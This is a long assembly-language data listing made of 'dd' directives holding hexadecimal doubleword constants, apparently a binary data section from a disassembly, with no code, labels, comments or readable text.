dd 0C23E3FC6h, 357F7B0Dh, 1ABF8605h, 0FF11513Fh, 187DBAF9h
dd 41F07CBh, 0FDF8EB9Ah, 0F6D3A0EAh, 0BF8C01ADh, 6D02FF25h
dd 0FFF5C79Bh, 5E3EC6A9h, 0F952933Fh, 0E9C6EBF1h, 413FBF07h
dd 72C52D57h, 213FD1B7h, 355F471h, 7F8C5583h, 1F7FE127h
dd 59473065h, 0FDFFB2ADh, 0EBD6C8D9h, 0FF2E4ECBh, 0BF171FF3h
dd 91FD7C81h, 0A84F3CDCh, 0FF0D4B2Eh, 0A7FA5ADh, 6B7FB7C6h
dd 0C60FFDA1h, 9154D32Ah, 85093F6Fh, 53A4F0EEh, 3F23C7CBh
dd 4F91FF8Eh, 0A3D9D0CBh
dd 7F4BFF12h, 3F71F837h, 0DC0EC36Dh, 6F3292FFh, 7126687Fh
dd 3D4CACF2h, 0E061F1CEh, 0A4BF9FE9h, 4AFDA5E2h, 55E62D4Fh
dd 2BF8C41h, 3F5EBF78h, 5F1BD8B1h, 89C13996h, 3F3504D2h
dd 98E069FFh, 50C0268Fh, 0BE4EFFh, 0EE9B8643h, 0DBA9FF02h
dd 0EC37683Ch, 0C3ED3873h, 0FF3F01AAh, 0C259D079h, 1B96E07Dh
dd 1F7F6B81h, 1205909Bh, 0CDDB802h, 90FEE9FEh, 95A32F46h
dd 4EDEA1E3h, 113B022Fh, 5F599F3Fh, 0B77F0A9Ch, 0F6B3C97Bh
dd 3E3AACCCh, 0F8C2F506h, 4F7F8C9Bh, 107423EBh, 95BFFEA6h
dd 36ED0B99h, 3AB783FDh, 0BCBAA886h, 7FB709BFh, 3C8DBC33h
dd 85E4DB7Fh, 35F86DFFh, 41079F36h, 1A643F7Fh, 0DCFFAF52h
dd 1A097F1Ah, 0C6FD4478h, 0FC7F819Fh, 7598FAA8h, 3A3F6366h
dd 2FEB63F1h, 407EBFFEh, 0F0DED76h, 0A4D978FCh, 2EE63007h
dd 0B1C260FFh, 2F079DFFh, 87DC1EDBh, 4AC9FF58h, 0F47F7D37h
dd 0B8015A12h, 5EEC903Fh, 90A8ADFFh, 3F935A46h, 0CA8251FFh
dd 946B4A12h, 7FA981D9h, 7BDBBFC7h, 0C88C1C7Fh, 93127F7Fh
dd 93459BFFh, 4F00A1F0h, 3FBFE132h, 2C3E2419h, 0EB5ED521h
dd 7F37E2A9h, 7F3BBC8Ch, 7F109C18h, 7F7FBCECh, 2A4538AFh
dd 44C6F597h, 0FF1B994h, 7FBF2AC8h, 0A6C27160h, 0CFFF0835h
dd 0F3F8C229h, 0EECB680Bh, 0DEBA7F47h, 2E8FB8FFh, 5F814496h
dd 0BF41A609h, 0DE9498FDh, 8CC55FF9h, 0FF63437Fh, 6E4EC1A0h
dd 7079BFA9h, 7FBF6B39h, 522E1F35h, 0FFAB84F8h, 0A4787864h
dd 8B37A98Bh, 0FF0B5160h, 19B39708h, 0C8FF1890h, 0DB08332Fh
dd 0EE86BA38h, 7FD552C7h, 0E928CBC0h, 0BC76FFBFh, 87313FD6h
dd 7F697F38h, 0C32846E5h, 6B567FF6h, 3FBE327Fh, 0CF66E552h
dd 0FFDC8D24h, 44D06FFh, 0F1A239A5h, 2B46FE51h, 79533FCCh
dd 0D03F17A3h, 0EF7F4DC1h, 740474FEh, 0CEA9A02h, 0BAEEBF37h
dd 0DA7992F0h, 0B7BF28FDh, 0E3D8151Dh, 3FEFBA82h, 0F1BB447Fh
dd 0DDF4B803h, 0FDFF9A25h, 0FFA9CCC6h, 9CED0333h, 0F089846Eh
dd 0F1FC7BFFh, 74703F54h, 60FFD02Bh, 9C1A7F6Eh, 4BC11F5Eh
dd 6BB73F0Eh, 7F5F7BFh, 0C0BF8D7Fh, 0FFB89CD0h, 3F465CA8h
dd 67BF1293h, 69FF63B7h, 0F83230FDh, 0BF057DA3h, 57F187Eh
dd 4BF0A88Ah, 0BF03A2D6h, 0B5F7073Fh, 0B3FF6F78h, 9E81FE65h
dd 3EF2C15h, 0B8B0FEBFh, 95A92552h, 70DABFC6h, 4834BF74h
dd 0D88CE7Fh, 9F55DB3Fh, 69C0E97Ch, 0E97F8702h, 0BF516BD2h
dd 92EC718Dh, 1BBF9AA5h, 0D178FF18h, 0BF348BD2h, 0BF37C928h
dd 0C4E29540h, 3FF9745Fh, 95AB704Ah, 65A4786Fh, 3F6A84D5h
dd 0A8ED1F67h, 6D7F0538h, 3FAD5351h, 0A392FFFFh, 0AE440047h
dd 0BF07B804h, 0AB3A2E7Eh, 91A091D4h, 391B9F3Fh, 1239FED7h
dd 767E543Fh, 0B0FF3742h, 0D87F6EFDh, 1189722h, 7E05E073h
dd 0A3B4DFA8h, 0FE777814h, 57C96AF5h, 0E102BE4h, 0B144FCBFh
dd 0B0070C7Ah, 0A6A5BF0Ah, 4F9B69EDh, 1878FD7Fh, 0C3605B31h
dd 0C23FFFCDh, 0E77F8BF7h, 0D6E2C923h, 3F5CA7D5h, 416C8E99h
dd 0CE7F0806h, 383E975Dh, 4FBDDD4Ah, 4F5C5FFh, 8F052AFFh
dd 0A0DC523Fh, 0BDADFFC1h, 6E5A88FFh, 38223F23h, 0AC44FF5Ch
dd 0E80A7F1Dh, 4701F3CCh, 0FE63AB3Fh, 20FFC532h, 911A10B8h
dd 3F6383BFh, 68C38F8h, 0BF6E7F71h, 0BF266CF0h, 7F913DC6h
dd 8AFE4DF7h, 0F1BF2C3Fh, 0BF8CDEFCh, 0BF28F8Ch, 0C4D7F692h
dd 0E43F6736h, 3260C65Ah, 0D39D3F47h, 0DE2721FCh, 635950BBh
dd 3F4EDDBFh, 92F87FC6h, 0F1BA64BFh, 3F8F21CEh, 0FE9990A5h
dd 545505DAh, 0C4EBC2B7h, 0DF302FBFh, 0BF63FD2Ah, 32FF584Eh
dd 0BBF5F0F2h, 637FDD11h, 0BF365B12h, 7F3B6E43h, 3E77ED44h
dd 0C2A405ECh, 3FFF61F6h, 7895F916h, 0B69E8167h, 0FA218270h
dd 0F8F8C7BFh, 0FFDFAC3Fh, 4942415h, 88238CF8h, 3F5C1629h
dd 0F30BEA4Eh, 0BF4DA478h, 0C3FEB867h, 47D01F7h, 1E250C7Fh
dd 420F1FCh, 4B029E05h, 0DFFF54FFh, 857239B7h, 0F42A2729h
dd 598BEh, 0C11E7FBDh, 0FABF8D0Ch, 18BF7F3Bh, 2F3F4D3Dh
dd 0D4E3623Fh, 0AB457F47h, 0BB0380DEh, 7185D725h, 1F3F968Bh
dd 0F96EFA7Dh, 683F4AA4h, 5C3FC429h, 63FFBC3Fh, 0FF0292FFh
dd 7FA6A17Bh, 3F329118h, 0FF48AD67h, 7F058DCEh, 27938FCDh
dd 61A989E5h, 91A54FFEh, 0A8DA3982h, 7CA33FC6h, 0BF5B6C12h
dd 439AFA6Ah, 0DEA52799h, 0F1FAC0BFh, 27EBDDEh, 0F8FF11EAh
dd 25FAC473h, 0B57F4666h, 9E7FFF24h, 0C3ABE510h, 0A83F0B3Dh
dd 1FCB99F5h, 8EC86ECDh, 68FFC677h, 3104E47Fh, 0FF608636h
dd 69BF438Ch, 6B31FF29h, 0A919FF7Ah, 0E1789FFh, 0D8088697h
dd 0FF3FF00Ah, 0CD3FC956h, 0FD9E8005h, 0A1DA42F2h, 7F0D0211h
dd 68C9FF3Dh, 620B500h, 928B6E80h, 4702604Fh, 0FC34D63Fh
dd 0C4A51238h, 0BF1BB62Bh, 0FFBD0F2h, 8A46BFBFh, 0C1BA1816h
dd 3F8CEA78h, 19559310h, 0F8BF8DFFh, 2E154CAh, 4EFF1F83h
dd 386E3AAh, 22A800A4h, 0EF92BF5Eh, 0AD7F0575h, 0BF63C836h
dd 0E13F197Fh, 18FF5503h, 2CBFFD3Bh, 0CFFF48C6h, 54F4D02Fh
dd 272C02E7h, 0CAA51AFFh, 0C8B7E5BFh, 4F8FC208h, 8C59333Fh
dd 9B07643Fh, 79F43F31h, 255EB009h, 9FFBBF8Ch, 8D89A00Eh
dd 0B81BFEFh, 0C0555Dh, 0F4743FDCh, 3F773F63h, 6F4ED612h
dd 0DBCE243Fh, 0E90ABFF9h, 2A7EDBAAh, 0DF60B335h, 7F583F07h
dd 0BF8FC7C1h, 0F7903B6Dh, 1EA06714h, 0BFDA477Fh, 72EA3FA3h
dd 0C786FF6Ah, 0D1627C3Fh, 9816A5B2h, 7B9CF2F1h, 905D7F3Fh
dd 0DBBF5BA9h, 4A9041FEh, 0A0273BFh, 0D8D63FA6h, 893F7F96h
dd 0F2C567C2h, 0B133FF46h, 0BFD58FE1h, 4368037Fh, 0E1558E65h
dd 0FF2A6215h, 0FD93887Dh, 63F5B42h, 1F380DFBh, 3F3F4B60h
dd 7BBF6A8Eh, 3F87FF13h, 0D8DAB8D4h, 6908447Fh, 0C0180CBFh
dd 2DE1FF13h, 7B7F7562h, 0BF15E609h, 0C2FB8F19h, 5147DB9Fh
dd 95146BDh, 0E5BFB8FBh, 24FFB73Bh, 4442D3D8h, 4A637FBFh
dd 1EE40455h, 0A13F6EB1h, 1FFE46C7h, 0F097AFFFh, 1A6F603h
dd 2639BF2Eh, 9F5DBF17h, 179A2BF6h, 75FD7F34h, 0E43D50ACh
dd 0ABF47F58h, 0FF3426CEh, 0D1FF5A66h, 0B37F8E1Ah, 0ACDE8D45h
dd 58617F9Dh, 7FFEA340h, 7FC7F71Ah, 0DC0A857h, 7ABF8F28h
dd 0A58479D0h, 7FC16B7Fh, 0D233081Eh, 0BF5BBFC3h, 77DAF083h
dd 7F8C032Ch, 1C3FFFEh, 0A9AF24A7h, 0A4397F98h, 159442FFh
dd 39B6B02h, 65724B7Fh, 8F6CB8C0h, 8506DDBFh, 3F9A39C2h
dd 754AA2E8h, 0A3F8DBFh, 82313F19h, 0CC3EBF27h, 0BFDCD575h
dd 0BF6F5F2Ch, 8B83F2BCh, 0DB7F7F07h, 0CCECDEC2h, 2EBF5D4Bh
dd 44D67F46h, 818FFE23h, 8D718B5Dh, 867B7FDFh, 97272877h
dd 0A34CFF08h, 0CDD8A8FFh, 7F08E782h, 3F36C3FCh, 0CE8C5360h
dd 70BFBF3Bh, 0FF0F15CAh, 94C43742h, 9795C5EEh, 1604BFBEh
dd 0BFB1FE46h, 54DA9E9Fh, 746CC5E3h, 0C054197Fh, 9E107F6Fh
dd 333F46A8h, 193FA9F6h, 44FEFEB7h, 0DFF72B88h, 7B04F67Fh
dd 0CF411BBFh, 75FF2BABh, 0BF63D0D6h, 0C5C220D7h, 461AF53Fh
dd 6CBF35A3h, 23CC7F8Ch, 0DBEA18FFh, 0BFC6CE3Fh, 0F1117F1Ch
dd 6C89A845h, 31A3A03Fh, 0E7B0FEBFh, 6B74B9A7h, 0E67F01EAh
dd 6EBF4B9Ah, 7ABF35A3h, 0F0F9E183h, 903F367Fh, 0C1BF37FFh
dd 0A1D8FC4Eh, 6A421577h, 3DC3F23h, 0D473C47Fh, 7FBC88C0h
dd 754DC9Bh, 0CF35203Fh, 7FFFE3A1h, 0BF188976h, 7F0DB135h
dd 6DBF58F5h, 0DD0C33Fh
dd 0F8FFB1BFh, 0DA65F709h, 0A3FF1139h, 5426BF74h, 0C46D737Fh
dd 3F828755h, 79E1591h, 3F0EDFB4h, 0FBD6AA5Ah, 42F49E82h
dd 0AA1AFF5Bh, 0BF5DFFBDh, 0CE3F18ABh, 1EBF97D3h, 0E36E068Bh
dd 0B67F1E1Dh, 0E07F8B21h, 3F9FA11Bh, 0EDE0903Ah, 7FDC38FFh
dd 0BF346F75h, 0A07F4B3Eh, 7F375C4Ah, 0FF52F6A9h, 19A51DFEh
dd 935A9C2h, 92CA7F7Fh, 0AE0AC0Eh, 790477FEh, 0EFBC6A0Ch
dd 0D4353F97h, 75CE8EFFh, 0DDB5CF58h, 0AD4AC2D3h, 7F79DB8Dh
dd 1FACF4ECh, 0FF6FF85Eh, 1B8DA586h, 8DFD15FFh, 0E0414462h
dd 0F5BF8CE5h, 7B76BF12h, 7616F03Fh, 117FB98Dh, 0C1BB7E1Ah
dd 0FBB62CC4h, 627FE5BFh, 2FE8545Fh, 7F9EEF7Fh, 0D0E402C1h
dd 3F1DD73Fh, 68FF6F58h, 8A60297h, 41A4FFBFh, 0D02AE0D1h
dd 6CF9AF82h, 0BF70B004h, 3F8DFF93h, 939C60C0h, 0BF3B033Fh
dd 0FF246018h, 0BF31BF5Ah, 0C07F1F8Bh, 0FEFEBF7Ch, 1D18E06h
dd 0F9673FA4h, 13ACBF0Dh, 12CD7A7Fh, 0BF476B45h, 0BBDAD019h
dd 3F2D5BBFh, 1AFFEC8Bh, 0C3F3DF0h, 0D07FACBFh, 7F5F41A2h
dd 0F02C71C5h, 0DB3FFA8Bh, 0AA8C477Fh, 422677Fh, 2D56FFBFh
dd 1BE5E3ABh, 0D3919AFFh, 0CDC20F8h, 3F5F53CCh, 9E842176h
dd 0C642F6E1h, 0F047197Fh, 0FFBF369Eh, 4F36A2EEh, 0FFFD8926h
dd 0CE3C7319h, 0D57F088Ah, 69FF9F52h, 0FF026A58h, 3F780F30h
dd 44FABF2Fh, 26F99210h, 0B7E5BF3Ah, 0F13D8C7Fh, 97147905h
dd 1010BFB8h, 3F0DFE95h, 0FFBBAE14h, 0FFC7EF82h, 0EB19D6Eh
dd 0BF1B87FFh, 1DABC3FAh, 3FFEBF50h, 8D416E5Ch, 5290C4BFh
dd 9D44BFB8h, 3E873F17h, 623F468Ch, 637F1820h, 0C801053Fh
dd 0D0BFEF7Fh, 0ABD6A76Eh, 947BC956h, 19BF4742h, 0C36FF1B0h
dd 0DE8BF2Fh, 31BF06DBh, 0C4BF24CEh, 7C3FE2B4h, 5BF7C2FFh
dd 0FDD5D67Fh, 1A7FF04Bh, 8D687F1Dh, 7F126C36h, 4A2AA0FDh
dd 0BF8CA525h, 0D4FFE9DDh, 1F3F3FE9h, 59FA90E7h, 0C8FFFFADh
dd 0F1C0FC21h, 18FF3FE9h, 60FF12ACh, 0B83F7038h, 5A31E97Fh
dd 755FB7BFh, 85692D3h, 7FA57F12h, 0C017DFAh, 0FFB32096h
dd 0FF1C009Ch, 0A8A27C97h, 0CCFFA6B7h, 619F8F7h, 750B7AEh
dd 0DD96FAFFh, 9111C2C5h, 287937Fh, 0E9FC857Fh, 3F449C7Dh
dd 0A5D8C8FEh, 0A397F76Ch, 0FF0BD6CEh, 0A8EFC65Fh, 9182F17Fh
dd 53F0FE6h, 0A5A46723h, 2B147FBFh, 0FF7B6579h, 8C0191C0h
dd 0FF58F03Fh, 0A77708A3h, 53FCBF62h, 2455EA2Dh, 0B940BF13h
dd 0A37FBFE1h, 0FBAEBF83h, 0C4CEFDFFh, 5BC2B625h, 0AE86FF4Dh
dd 11A93F9Dh, 0A1BA713Fh, 6575FFBCh, 2313BC83h, 0CCFF0363h
dd 0ADFFC6B2h, 0C2B2F147h, 0FE3FB123h, 0B8101B6Ch, 3F91A94Bh
dd 0AE90A8FAh, 0BFB15075h, 484569Fh, 0DADC28E3h, 0C154197Fh
dd 0C0383FB8h, 229CFFDCh, 63A1FF35h, 7F02D53Fh, 0C4F8224Ch
dd 6D3F972Ah, 0CF55FEC8h, 82C1D89Ch, 89BF2EA1h, 7D1FFF6Fh
dd 0FC730C35h, 7CAC5540h, 3F482107h, 7F3F38C0h, 0FF32015Eh
dd 85A28038h, 0F964AABFh, 0FFEB811h, 0BC1FB62Ah, 0F3927F11h
dd 7FFACD67h, 0ED3D5AACh, 422FFC6h, 0A3C1F07Fh, 63F13F6Eh
dd 388C7FAEh, 34BB7EBFh, 4605266Fh, 0ABF67FBEh, 54FFE001h
dd 478E6CCBh, 0B79FF451h, 0DAAAFF18h, 0D633BF12h, 810423FCh
dd 3F63FD9Ch, 0CFB7FFBFh, 0F52B5578h, 6F0B1B6h, 0BB6BEF1Eh
dd 80F85B7Fh, 5F3310BFh, 0D264EFA1h, 3FBFA9EEh, 7219B980h
dd 8CFF177Dh, 3FA8697Fh, 6338043Ch, 0C2148DFFh, 41FF30BFh
dd 8F5E3F8Ch, 0AD63170Eh, 0B1E8BF4Eh, 0BFDEF1A5h, 4F3362Ch
dd 74046AFFh, 0EE3F6F7Fh, 0B10086F6h, 0BFBDDC7Fh, 0B8D771DCh
dd 3356E0BFh, 3439D6FFh, 3BADEAFFh, 7DC5FFFBh, 0C081E07Fh
dd 63D49DCCh, 0BF57CCFFh, 0A1FF6F82h, 21BE8B6h, 0B2F9FFBFh
dd 0A9C83F53h, 323F06F7h, 53494CC7h, 0BEFFA93Fh, 0C1ED764h
dd 7C7FBFCFh, 0D522E00Eh, 6DFFBF91h, 3F55D50Fh, 11CE7FBCh
dd 0CE7F0883h, 0D0BF2532h, 7F8F904Ch, 0FF79CE0Ah, 95DB85C2h
dd 3057567Dh, 77E0A756h, 0CDFFCE2Bh, 5893EAEh, 0F1BFBE7Fh
dd 37D9AA42h, 405A6202h, 639D3FD4h, 87385CBFh, 6A1AF8FFh
dd 8E0225EDh, 8414FBBFh, 0FFF7D6C5h, 447F34C4h, 4D6BF03h
dd 0FFDE80A6h, 84D36427h, 0CF9B687Fh, 63F27EBFh, 0FF3E947Fh
dd 8BBFC7FAh, 65DBEB28h, 0EBF0BF19h, 6DA3BA5Bh, 0EA30057Ch
dd 6FA34CA3h, 0F5C2C83Fh, 4F3F6F01h, 870029E8h, 3F43667Fh
dd 5B7F4D80h, 0A8FF3FB2h, 0DCB95224h, 8BFBC2A8h, 99A0BF9Bh
dd 0E05B3F47h, 0B225AEE9h, 2978783Fh, 0E2BF5EACh, 3F916078h
dd 0E57D55FFh, 0C3127h, 0D1BF583Ah, 16FF9896h, 0BF09CAE3h
dd 0BB5226BFh, 0F0737CDCh, 0F7780E09h, 7AE03F48h, 0C47FB1D6h
dd 0BFD81BB0h, 0FF5EF2C3h, 98D35E03h, 0E17F463Fh, 7FBF9CD5h
dd 0C05E94EEh, 85D24551h, 1A33BF9Dh, 4418FFA9h, 5F787F8Ch
dd 7F177BCAh, 0F5F86BBFh, 41D15C9h, 99D47FDFh, 25D8469Ah
dd 8CD37FFDh, 434FDBFh, 23F252E9h, 0A4F6173Fh, 0BF979B85h
dd 5CFDCCE2h, 0BAA06F3Fh, 0BF91E0EAh, 0E52BFCFAh, 3F11D972h
dd 0C9AF189Fh, 581A7FCh, 3650278h, 70D741FFh, 997FC6FFh
dd 18FA3F0Fh, 2178BC18h, 7E393F46h, 27019D9Ch, 89ACFC3Fh
dd 2ACCA784h, 925FBF2Fh, 0F614FFB9h, 0D760A3ECh, 8ED0C1Ah
dd 0F7C0F6C2h, 0ABA5F205h, 0A1837E3Fh, 99D75804h, 727DBF09h
dd 0A8AA1F5h, 8BBF31F7h, 8DC1FF72h, 3F0ED37Fh, 0A59F3F11h
dd 0A1E2F6F6h, 7FDFC6AFh, 0B0E7C805h, 0F8337F02h, 57E9FF83h
dd 7F072D7Fh, 9C69B27Bh, 4183F4Fh, 4A67BF32h, 0C1972885h
dd 0BF8CD7CEh, 340C83DEh, 0C9EBDE38h, 0C025F14Eh, 0BF6842C6h
dd 7FC410E1h, 2003807Fh, 8BDCB552h, 0FF877FC2h, 398EF47Fh
dd 71D255D8h, 97317F0Bh, 5379ACC0h, 0FFF1463Fh, 53C68BF0h
dd 65207F48h, 33FF8CFFh, 0ED26BF5Fh, 3F4DF4CEh, 29204FCFh
dd 5836BF0Fh, 231170FFh, 1627CAFFh, 3FDA8482h, 6EBFC6F8h
dd 0DFF8FF27h, 0D04F4A2Dh, 0A88B7F31h, 6EB73F3Fh, 24EADEB6h
dd 3FC7A402h, 39E9DB95h, 717F6F4Eh, 7F74B8EBh, 47BF6F0Eh
dd 0F580C371h, 3314FF7Ch, 0D8C63F2Fh, 0E304F02Eh, 0BF8D0952h
dd 0E8FF78C4h, 0FFBFE97Fh, 58FF3FCBh, 9E7C79AAh, 1BE442EEh
dd 1B8B5EBFh, 71CE7A7Fh, 3BFF5D25h, 5C7F0FC4h, 523FD141h
dd 16D7F23h, 3F58BFE8h, 1B3F4629h, 0AC7C3F0Ch, 13E5BA24h
dd 7F7F89BFh, 0C4778DC7h, 0CCA1C6DCh, 7F78313Fh, 7DA2FF31h
dd 0B0FF7FC9h, 80B9B306h, 0A915396Bh, 13BEFF5Ch, 7736D681h
dd 0C69FBF11h, 0A9E2D0FDh, 3F91FDC2h, 0FF6F06A2h, 0A1015F12h
dd 0DF6738F5h, 0FC3F659Ch, 0A26BD723h, 8B7F2F11h, 44D012D3h
dd 927FF06Bh, 15897F37h, 0CF50F086h, 3F234E3Bh, 0FFC63A0Fh
dd 523F2729h, 0FBCE3FFh, 0BBF07CB2h, 0FE6ECC1Dh, 0A216047Fh
dd 677FACC3h, 0E23F06DEh, 3F470AADh, 6AE4286Ch, 4360AD25h
dd 3F4BFF18h, 0F4F30627h, 0BFA969A0h, 0CDF72D3Fh, 0B7D27E6Dh
dd 0BBE1BF0Fh, 4D19FFF4h, 0F620F207h, 8E3C78B9h, 5FB0EA3Fh
dd 0CA42FF71h, 0A55BFBD5h, 35595450h, 0FD59BAAh, 0B72040D7h
dd 0DA1F64C4h, 63211140h, 0B58A9D5h, 6B1FCC35h, 0BA1E8AF9h
dd 31AACE71h, 0BA21113Dh, 84055EC0h, 249B8871h, 0E8514D09h
dd 67B40560h, 0AEC4FB0Fh, 7AE549C0h, 0FCA38F02h, 6C1161ACh
dd 54954667h, 0DA3CC39Eh, 0D5D32ED6h, 556A3E23h, 0FA7BF877h
dd 15AE4BA3h, 78266380h
dd 71AD2014h, 3DA81634h, 44C682B4h, 58D4CC24h, 8C229716h
dd 535F9D95h, 0BDB38D00h, 0C218C48Eh, 233F0AEBh, 0C902A018h
dd 428BEA7Ah, 11A721E6h, 474FE912h, 60551EC1h, 1813D0B9h
dd 12533457h, 41080865h, 2BF5EF9Bh, 271505D2h, 3593A078h
dd 0B460F5C9h, 78845408h, 9D32D4C9h, 0E8C330B6h, 0D602EB09h
dd 893806C2h, 396F0022h, 0F7FA1289h, 158F2B8h, 1CE88637h
dd 9231583h, 0B3B6FDB9h, 0BBA7A9BAh, 0EEC08F56h, 0BCBCD010h
dd 0D5F4CF01h, 0A95D2ADBh, 0BFB2D015h, 0A04A0248h, 9192945Ch
dd 6D7D0901h, 0C7430F2Bh, 0D73E3775h, 0C00C7E03h, 4E7A469Ah
dd 4AF5F6C1h, 0A3478855h, 59A81DFDh, 0F5B90ABEh, 17C90019h
dd 9812888Ch, 0E94102FAh, 3C13476Ch, 2C276C9Dh, 67D3C0D0h
dd 0CF211602h, 46289026h, 0F9951ED1h, 0BFFB2044h, 1D34AAEh
dd 1C2D2659h, 964CCCE3h, 8CBFE251h, 33311B8Fh, 0B78D32E2h
dd 5FC8D1DCh, 0D8B38D33h, 8640EC47h, 1A620E26h, 1AED758Ch
dd 0CF6FD503h, 2428D846h, 0A8E91A0Ah, 317D6340h, 88F0C19Ah
dd 0F0F000F5h, 3270BD14h, 0C80454CDh, 184024E1h, 95CD0A4Bh
dd 4C089CDBh, 75497B70h, 0E3AD1D88h, 5713EC26h, 0DB6A1FE3h
dd 1136E423h, 121D7BF2h, 21101230h, 0ED182D60h, 4BE55DFh
dd 58C39C8Bh, 20DC013h, 532C71D3h, 46D45592h, 0DDAA5A75h
dd 45262CE1h, 0A27D992Bh, 0DF2AA54Ch, 0CB20309Dh, 0EF31630Bh
dd 9A000079h, 4E2B6B80h, 24617C24h, 0AD3004h, 0D605BA39h
dd 3C80CD23h, 651B53BEh, 39808CECh, 0ED670484h, 0D39167C6h
dd 1287F1C0h, 1B094BC3h, 8B26B4BEh, 0B93CA690h, 3E5804E0h
dd 0BD02C034h, 6C662A02h, 0B5D0C23h, 9EDC028Ch, 94FAC39Eh
dd 3CCEA8E2h, 7A03DC8Eh, 0CD952606h, 83324B70h, 7E763B58h
dd 5C617DECh, 0C908B472h, 2B7D14FDh, 0FD05D4DBh, 90281A83h
dd 0E87D72BDh, 1A52080Bh, 0CC255C17h, 0F230D415h, 33D8631Ah
dd 2389EA06h, 89BED681h, 0F3F7721Bh, 59D058E5h, 1887105Bh
dd 1434C608h, 64793B5Bh, 41C87B0Bh, 0BB189F78h, 25621E41h
dd 2E0007E0h, 304E1D4Fh, 1C7DECCDh, 0F4C500F0h, 0E4877763h
dd 30C108DBh, 5695F4E0h, 0D3633D03h, 996F16C0h, 0C92BDD11h
dd 0C960E405h, 1D20B5E4h, 0E42175E0h, 0C997C10Dh, 5F303388h
dd 64ECFEC9h, 6A0631FFh, 7FCDA989h, 989970Fh, 0F1B9F7EFh
dd 1C9BF58h, 9A5B4F59h, 986D1CFFh, 0E7F64C54h, 5B81A317h
dd 3BB8BF40h, 0C79B41F9h, 14C10FFh, 0B63C5D18h, 6A1FF5Ah
dd 0EB2562ACh, 16FF82DDh, 88A82E01h, 0FF91239Bh, 7E744DF1h
dd 0B2B4F02Eh, 88172BFFh, 9A5A6DFBh, 0CA4FFE9Ah, 7D1A0E3Dh
dd 0EC3FDF58h, 0F9D6CC71h, 1B10F0B2h, 0CC3B72A5h, 0FFA152E4h
dd 61AC68C5h, 0EDB8CBDh, 0FF3B0D90h, 0EEB2B0F8h, 3F64244Ch
dd 0F8CFD1FFh, 3B0DD0B2h, 8481FFBAh, 66445167h, 7F6EE895h
dd 3FDD7858h, 7FBF7B35h, 0B3F9257Fh, 3782AA3Fh, 0FFC69BF0h
dd 0BD1817A8h, 58BCDD76h, 8EC34BFFh, 0E9CD4380h, 0F93F6EB0h
dd 0CF075F63h, 0D7F96324h, 0D2D2109Ch, 255FF968h, 5A76A783h
dd 0CAB373FBh, 7F06C373h, 2E7263E7h, 9DD405D8h, 2F975B06h
dd 231759E8h, 2E2EF65Fh, 3A4B36E3h, 6143FFDAh, 585482D0h
dd 7F6F118Ch, 0FF2E3417h, 17417DC7h, 0B35D123Ah, 9D82EEFFh
dd 724CD8E7h, 2391FF98h, 0A1C95B76h, 59FE5A89h, 81915976h
dd 0A343AD88h, 927DAA24h, 8F2C3A86h, 826F59BFh, 4360B8FFh
dd 177B2BCCh, 3AEDED7Bh, 0F9C8FFC5h, 0F4B3FD59h, 0D2962DF6h
dd 2DE515BFh, 1B56FE39h, 1796976Dh, 0FF14D60Dh, 0DB927EE5h
dd 0F9BFD591h, 513117B7h, 43CBFE0Fh, 213A2662h, 0B7902D4Eh
dd 44178D92h, 3B3FD4B7h, 3F3F0951h, 43A26389h, 0B068FF8Dh
dd 444DC9B3h, 0A2FF258Dh, 2BF98981h, 0B36AB4D0h, 0BFFDBF65h
dd 742D2EBAh, 7F94AD01h, 0C2ACC5F6h, 0A1E4FF20h, 0A0B1769Dh
dd 0DB71CBBFh, 0E69D25F6h, 0A5E53F1Ah, 8426DAD8h, 0B6CA95FFh
dd 793F44BFh, 221F6A42h, 0FD45B015h, 920136F9h, 7FBFEBE9h
dd 5A4BE18Eh, 51A4FFF9h, 45171609h, 0CFFA72Ah, 6923482Dh
dd 0D807F9B1h, 0E5BF057Fh, 0EBE1AB25h, 7FC64FFCh, 0C8FB8443h
dd 0E5FFFBEDh, 720EF973h, 0C2FA6263h, 3FFF2120h, 0CD07F517h
dd 7FE4B767h, 0BFFC1930h, 0E3187B1Ch, 0C33F274Ch, 3F117F62h
dd 31784FCBh, 65B3E8F0h, 0E7FBFBEh, 1A2D72F6h, 0E3147F6Eh
dd 2D777F12h, 5AF0BF44h, 0FFBEE12Dh, 0A11DB6E4h, 0C1C2BF13h
dd 86F9FFDCh, 7FFBCFA7h, 8C483B0Ch, 8CF94382h, 0D7C94F68h
dd 0CC7FBF31h, 2C6B2D5h, 635DB1F6h, 15FC3FFBh, 1622049Dh
dd 0FFFF2BB6h, 2DC3AC57h, 0F91EB678h, 23D7365Dh, 7F866D43h
dd 76FFC7B2h, 0C63FA0FBh, 95E17FBEh, 67763F84h, 507BFF82h
dd 802E7F89h, 0D881FFDEh, 1B322519h, 23E667BFh, 10C286DDh
dd 733BBFE5h, 2E1EFF65h, 0BF3711ECh, 7F6D7958h, 0F0FFB20Fh
dd 0BFA763E1h, 63D2B272h, 0FF2FF6FFh, 889FECB1h, 7FF47BFh
dd 36EDC3BFh, 0B9917FFFh, 0CFB16223h, 63BF1DF5h, 763F2684h
dd 0CBFF1765h, 308D9168h, 5870FD7Fh, 1F1D079Dh, 7F48BFB6h
dd 86D7DC62h, 0C5BF231Ch, 0CFF6812Eh, 1B3230FFh, 842481BFh
dd 2D30767Fh, 660C1E7Fh, 1BC03FDEh, 0D992975Dh, 0D4B1C60Ch
dd 0BC25D5BFh, 78981E54h, 8B26FF6Eh, 5EF53FE8h, 0B804D88Dh
dd 2EFC4CA5h, 0A633379Eh, 0FB3F670Eh, 0FDFFED87h, 1A64BD89h
dd 0BF27587Eh, 0BF8A8DB8h, 861CD7CBh, 0F1FF8784h, 0FFB3582Bh
dd 7F0FD3F2h, 0A48693FFh, 622EED21h, 5EB25DFFh, 0CCE5A6C6h
dd 3F87A521h, 7BBF0484h, 7FAB2666h, 0B800EDF0h, 5F0EF6FFh
dd 0ED734E3Fh, 3FB0B114h, 0BF3991C2h, 7FB8BD70h, 3F49DA9Fh
dd 0DE6C74E3h, 542EF8FFh, 243F4CB6h, 0E6F6F0BFh, 0C03FBF15h
dd 2C2C235Eh, 92B20CFEh, 160DED63h, 1D0BFCFh, 0D73C112Fh
dd 0DB2C0BC9h, 6E1D7FD0h, 68664ABFh, 0A1FFE86Dh, 96E7BFCEh
dd 0B2473B7Fh, 0ED7F0927h, 0D7B1C7A8h, 5B3FCFF5h, 63677F77h
dd 92AC91BFh, 0E93F423Fh, 78E80072h, 0DD651AE7h, 23C1757Fh
dd 0ECFEB3FFh, 5782494Ch, 3FDC2C79h, 81BE43C1h, 0DD913A4Dh
